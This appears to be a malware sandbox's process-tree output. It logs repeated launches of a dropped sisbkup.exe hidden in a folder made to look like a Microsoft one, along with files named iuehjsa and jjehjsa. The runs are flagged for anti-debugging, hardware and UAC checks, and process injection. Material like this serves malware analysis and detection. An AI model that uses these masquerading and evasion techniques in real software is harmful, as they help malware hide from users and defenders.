C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
